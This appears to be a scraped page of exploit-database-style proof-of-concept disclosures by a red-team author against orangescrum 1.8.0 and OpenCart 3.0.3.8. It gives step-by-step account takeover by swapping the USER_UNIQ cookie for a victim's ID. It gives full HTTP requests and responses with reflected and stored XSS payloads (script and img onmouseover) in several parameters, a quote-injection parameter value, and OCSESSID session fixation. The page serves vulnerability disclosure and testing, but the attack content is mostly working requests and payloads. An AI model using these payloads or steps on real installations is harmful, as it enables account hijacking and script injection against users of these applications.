Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
Referer: http://127.0.0.1/orangescrum/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Dest: empty

project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0

-----------------------------------------------------------------------------------------------------------------------
Res
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 12:51:23 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Vary: User-Agent
Expires: access 12 month
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

0
HireHackking 
# Exploit Title: orangescrum 1.8.0 - Privilege escalation (Authenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Privilege escalation


# The user must be assigned to the project with the account he wants to take over
# The vulnerabilities in the application allow for:

* Taking over any account with which the project is assigned

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example

1. Go to the dashboard
2. Go to the page source view
3. Find in source "var PUSERS"
4. Copy "uniq_id" victim
5. Change cookie "USER_UNIQ" to "USER_UNIQ" victim from page source
6. After refreshing the page, you are logged in to the victim's account
HireHackking 
# Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected


# Authenticated user

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example XSS Reflected

Param: projid
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

POST /orangescrum/easycases/edit_reply HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 64
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/orangescrum/dashboard
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

id=5&reply_flag=1&projid=1zxcvczxzxcv"><script>alert(1)</script>

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 13:28:57 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Content-Length: 1114
Vary: User-Agent
Expires: access 12 month
Connection: close
Content-Type: text/html; charset=UTF-8

<table cellpadding="0" cellspacing="0" class="edit_rep_768 col-lg-12">
	<tr>
		<td>
			<textarea name="edit_reply_txtbox5" id="edit_reply_txtbox5" rows="3" class="reply_txt_ipad col-lg-12">
				                    xczcxz"/><b>bb</b>bbxczcxz"/>&ltxczcxz"/><b>bb</b>bb;b>bb</b>bbxczcxz"/><b>bb</b>bb			</textarea>
		</td>
	</tr>
	<tr>
		<td align="right">
			<div id="edit_btn5" class="fr">
				<button type="button" value="Save" style="margin:5px;padding:3px 32px 3px 32px;" class="btn btn_blue" onclick="save_editedvalue_reply(2,5,1zxcvczxzxcv"><script>alert(1)</script>,'c64271510399996f611739b
[...]


## Example XSS Stored

Example vuln paraMETERS:
* CS_message
* name
* data[User][email]

-----------------------------------------------------------------------------------------------------------------------
Param: CS_message
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

POST /orangescrum/easycases/ajaxpostcase HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 393
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/orangescrum/dashboard/?project=3966c2c5cc3745d161640d07450d682c
Cookie: language=en-gb; currency=USD; CAKEPHP=j27a7es1lv1ln77gpngicqshe4; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; CURRENT_FILTER=cases; TASK_TYPE_IN_DASHBOARD=1; LAST_CREATED_PROJ=14
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

pid=14&CS_project_id=8f4adc0f496a3738f04d629be909488d&CS_istype=2&CS_title=&CS_type_id=15&CS_priority=1&CS_message=zxcvbzz"/><img%20src=x%20onmouseover=alert(1)>axcbv&CS_assign_to=1&CS_due_date=&CS_milestone=&postdata=Post&pagename=dashboard&emailUser%5B%5D=1&CS_id=2678&CS_case_no=1&datatype=1&CS_legend=2&prelegend=1&hours=0&estimated_hours=0&completed=0&taskid=0&task_uid=0&editRemovedFile=

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 13:51:29 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Vary: User-Agent
Expires: access 12 month
Content-Length: 698
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":"success","pagename":"dashboard","formdata":"8f4adc0f496a3738f04d629be909488d","postParam":"Post","caseUniqId":"eb8671bf1e20702b7793b11152e9ff32","format":2,"allfiles":null,"caseNo":"1","emailTitle":"aaaaaaaaaaaaaaz\"\/><img src=x onmouseover=alert(1)>a","emailMsg":"zxcvbzz\"\/><img src=x onmouseover=alert(1)>
[...]
HireHackking 
# Exploit Title: opencart 3.0.3.8 - Sessjion Injection
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/
# Version: 3.0.3.8
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Sessjion Fixation / injection

Session cookie "OCSESSID" is inproperly processed
Attacker can set any value cookie and server set this value 
Becouse of that sesssion injection and session fixation vulnerability

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example

Modify cookie "OCSESSID" value:
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/opencart-3.0.3.8/
Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------------------------------------------------------------------------------------------------
Server set atttacker value:

Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 15:16:06 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: PHP/8.0.11
Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18944
[...]